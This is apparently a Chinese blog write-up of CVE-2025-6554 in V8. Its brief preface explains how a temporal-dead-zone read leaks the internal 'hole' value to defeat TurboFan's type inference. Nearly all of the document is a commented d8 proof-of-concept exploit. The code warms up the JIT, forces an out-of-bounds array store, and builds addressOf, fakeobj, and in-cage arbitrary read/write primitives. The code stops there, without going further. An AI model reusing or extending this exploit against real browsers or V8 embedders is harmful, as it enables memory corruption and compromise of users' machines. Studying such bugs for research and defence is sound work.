CVE-2025-6554

前言

非常著名的洞，学习了一下。漏洞利用 TDZ（暂时性死区）泄漏出 V8 内部的 the hole，再巧妙地利用 hole 的特性绕过 TurboFan 的类型推断。先给出一个 PoC（注意：代码中用到了 %DebugPrint、%SystemBreak 和 readline，需要在 d8 下加 --allow-natives-syntax 运行，在普通 Node/浏览器中会直接报语法错误）。

poc

// One 8-byte scratch buffer with several typed-array views aliased over it.
// Writing through one view and reading through another is how the helpers
// below reinterpret a double's bit pattern as integers and back. Views use
// the host's native byte order; the helper names (`lh`, `_lo`, `_hi`) are
// written for little-endian, i.e. u32[0] is the low dword of f64[0].
var buf = new ArrayBuffer(8);
var u8 = new Uint8Array(buf);
var u16 = new Uint16Array(buf);
var u32 = new Uint32Array(buf);
var u64 = new BigUint64Array(buf);
var f32 = new Float32Array(buf);
var f64 = new Float64Array(buf);

// Assemble a double from two 32-bit halves: `l` lands in u32[0] (low dword)
// and `h` in u32[1] (high dword); the return value is whatever double those
// 64 bits encode. Both halves go through Uint32Array, so they wrap like
// ToUint32 (e.g. -1 becomes 0xffffffff). Clobbers the shared scratch buffer.
function lh_u32_to_f64(l, h){
  u32.set([l, h]);
  return f64[0];
}
// Low 32 bits of the IEEE-754 encoding of `val`: store it as a double into the
// shared scratch buffer and read back u32[0]. Clobbers the scratch buffer.
function f64_to_u32l(val){
  f64[0] = val;
  const [lo] = u32;
  return lo;
}
// High 32 bits (sign, exponent, top mantissa bits) of the IEEE-754 encoding of
// `val`, read back as u32[1] after storing it into the shared scratch buffer.
function f64_to_u32h(val){
  f64[0] = val;
  const [, hi] = u32;
  return hi;
}
// Full 64-bit encoding of `val` as a BigInt (u64[0] after storing the double
// into the shared scratch buffer). Callers such as cage_read() rely on the
// BigInt type so the result can be masked/shifted without precision loss.
function f64_to_u64(val){
  f64[0] = val;
  const [bits] = u64;
  return bits;
}
// Reinterpret a 64-bit pattern as a double. `val` MUST be a BigInt: storing a
// Number into a BigUint64Array throws a TypeError, so callers (cage_wtite)
// have to pass e.g. 0x41n, not 0x41. Clobbers the shared scratch buffer.
function u64_to_f64(val){
  u64[0] = val;
  const [asDouble] = f64;
  return asDouble;
}

// Low dword of a 64-bit BigInt (u32[0] after writing it to the scratch
// buffer). Throws TypeError if `val` is a Number rather than a BigInt.
function u64_to_u32_lo(val){
  u64[0] = val;
  const [lo] = u32;
  return lo;
}

// High dword of a 64-bit BigInt (u32[1] after writing it to the scratch
// buffer). Throws TypeError if `val` is a Number rather than a BigInt.
function u64_to_u32_hi(val){
  u64[0] = val;
  const [, hi] = u32;
  return hi;
}

// Break into the debugger. `%SystemBreak()` is a V8 runtime function, so this
// file only parses under d8 with --allow-natives-syntax; in a stock Node or
// browser engine the `%` call is a syntax error for the whole script.
function stop(){
%SystemBreak();
}

// Dump a heap object's internals (map, elements, properties) to stdout via the
// V8 runtime function `%DebugPrint`. Same d8/--allow-natives-syntax
// requirement as stop(). Used only from the commented-out calls after opt(true).
function p(arg){
%DebugPrint(arg);
}

// Print a marker line and then break into the d8 debugger via stop().
// Debug aid only; not called by the PoC flow in this file.
function spin(){
  const banner = "spin...";
  console.log(banner);
  stop();
}

// Pause until the operator presses Enter: prints a marker and blocks on d8's
// global readline(). Useful for attaching a debugger before continuing; the
// read line itself is discarded. Not called by the PoC flow in this file.
function stuck(){
  const banner = "readline....";
  console.log(banner);
  readline();
}

// Render a Number or BigInt as at least 16 lower-case hex digits, zero-padded
// on the left and without a "0x" prefix (logg() adds it). Values wider than
// 16 digits are not truncated. Negative Numbers pad around the "-" sign,
// e.g. hex(-1) is "00000000000000-1", so pass unsigned values.
function hex(str){
  const digits = str.toString(16);
  return digits.padStart(16, "0");
}

// Log a labelled 64-bit-style hex value: "[+] <label>: 0x<16 hex digits>".
// `val` may be a Number or BigInt (see hex()).
function logg(str, val){
  const label = "[+] " + str;
  console.log(label + ": " + "0x" + hex(val));
}

// Trigger function for the CVE-2025-6554 TDZ "hole" leak.
//
// It is first called ~60k times with trigger=false (see the warm-up loop
// below) so that TurboFan compiles it using the value ranges the author
// recorded as "inferred" in the comments, and then once with trigger=true.
// Returns [_oob_aar, _obj_arr, _rw_arr]; after the optimized run, the caller
// treats _oob_aar as an array it can index beyond its own storage into the
// other two (see addressOf/fakeobj/cage_read below).
function opt(trigger) {
let x;
// `y` is used inside an optional chain before its `let` declaration, i.e.
// while it is in its temporal dead zone. Per the write-up, this is the bug:
// instead of throwing a ReferenceError, the read yields V8's internal
// TheHole sentinel, which is then captured in `hole`.
delete x?.[y]?.a;
let hole = y;
let y;
let o = {};
// Training calls take the string branch; only the final call stores the hole.
o.maybe_hole = trigger ? hole : "not the hole";
// Each "inferred"/"actual" pair below is the author's note of what the
// optimizing compiler assumes for the value versus what it can really be
// once `maybe_hole` is the hole rather than a string.
//inferred: (0, 535870888) actual: (-524289, 535870888)
let len = o.maybe_hole.length;
var _oob_aar = new Array(8);
_oob_aar[0] = 1.1;
//inferred: (0, 1) actual: (-1, 1)
let sign_val = Math.sign(len);
//inferred: (0, 1) actual: (0, 2)
let v1 = 2 - (sign_val + 1);
//inferred: (0, 0) actual: (-1, 0)
let v2 = (9 - (v1 + 8)) >> 1;
//inferred: (1, 1) actual: (0, 1)
let v3 = v2 + 1;
//inferred: (1000, 1000) actual: (0, 1000)
let idx = v3 * 1000;
// Per the ranges above: the compiler believes idx is always 1000, but with a
// negative `len` it is 0 at runtime. This typer/runtime mismatch on the store
// is what the rest of the PoC builds on. NOTE(review): how exactly this store
// turns _oob_aar into an out-of-bounds-readable array is not shown in this
// file; treat the layout assumptions in addressOf/cage_read as empirical.
_oob_aar[idx] = 1.1;
// Allocated immediately after _oob_aar, presumably so they end up adjacent to
// it in the heap; the fixed indices 14 and 20 used later depend on that.
let _obj_arr = [{}];
let _rw_arr = [1.1];
return [_oob_aar, _obj_arr, _rw_arr];
}

// JIT warm-up: 60,000 calls of opt(false) (six per iteration) so that V8 tiers
// opt() up to TurboFan with the "inferred" ranges baked in before the single
// hole-carrying call below. The count is empirical; presumably too few
// iterations leave opt() unoptimized and the trigger call just throws or
// behaves normally. Do not restructure this loop casually — the exploit's
// reliability depends on the tiering behaviour it induces.
for (let i = 0; i < 10000; i++){
opt(false);opt(false);opt(false);
opt(false);opt(false);opt(false);
}

// The one optimized run with the hole. From here on the PoC assumes oob_aar
// can be indexed past its own storage into obj_arr's and rw_arr's backing
// stores (indices 14 and 20 below are layout-specific constants).
var [oob_aar, obj_arr, rw_arr] = opt(true);
// Debug aids (need d8 --allow-natives-syntax): uncomment to inspect the three
// arrays and confirm the expected adjacency before using the primitives.
// p(oob_aar);
// p(obj_arr);
// p(rw_arr);

// Leak the 32-bit (presumably pointer-compressed) address of `obj`.
// `obj` is parked in obj_arr[0], and oob_aar[14] is assumed to overlap that
// element slot, so the reference shows up in the high dword of the double
// read back from there. The assumption comes from the heap layout produced
// by opt(); if it does not hold, the returned value is garbage, not an error.
// Side effect: obj_arr[0] keeps `obj` alive afterwards.
function addressOf(obj){
  obj_arr[0] = obj;
  const overlapped = oob_aar[14];
  return f64_to_u32h(overlapped);
}

// Forge an object reference: write `addr` into the high dword of oob_aar[14]
// (the slot addressOf() reads obj_arr[0]'s reference from) with a low dword
// of 2 — presumably the value expected in the neighbouring slot — and then
// read the element back as an object through obj_arr[0]. The result is
// whatever V8 dereferences at `addr`; a wrong address typically crashes the
// process rather than throwing.
function fakeobj(addr){
  const forged = lh_u32_to_f64(2, addr);
  oob_aar[14] = forged;
  return obj_arr[0];
}

// Read 8 bytes at 32-bit address `addr` and return them as a BigInt.
// oob_aar[20] is assumed to overlap rw_arr's elements pointer (low dword) and
// length field (high dword, 0x2 = Smi 1). Pointing the elements pointer at
// addr - 8 — skipping what is presumably an 8-byte FixedDoubleArray header —
// makes rw_arr[0] alias the target memory. The subtraction is done as a
// Number and then wrapped to uint32 by the store, so addr < 8 silently
// wraps. "cage" in the name: only 32-bit, cage-relative addresses can be
// expressed here. The original debug break (`stop()`) before the read has
// been dropped; call stop() from the caller if you need it.
function cage_read(addr){
  const fakeElements = lh_u32_to_f64(addr - 8, 0x2);
  oob_aar[20] = fakeElements;
  return f64_to_u64(rw_arr[0]);
}

// Write the 8-byte BigInt `val` at 32-bit address `addr`, the mirror of
// cage_read(): redirect rw_arr's elements pointer (via oob_aar[20]) to
// addr - 8 and store through rw_arr[0]. `val` must be a BigInt — a Number
// makes u64_to_f64 throw TypeError. Bit patterns that encode NaN may be
// canonicalized on the way through a double, so do not rely on this for
// arbitrary NaN payloads. Name typo ("wtite") kept for compatibility.
function cage_wtite(addr, val){
  const fakeElements = lh_u32_to_f64(addr - 8, 0x2);
  oob_aar[20] = fakeElements;
  const asDouble = u64_to_f64(val);
  rw_arr[0] = asDouble;
}

// Break into the d8 debugger once the primitives (addressOf/fakeobj/
// cage_read/cage_wtite) are set up. The listing ends here: no further
// exploitation steps are part of this file.
stop();
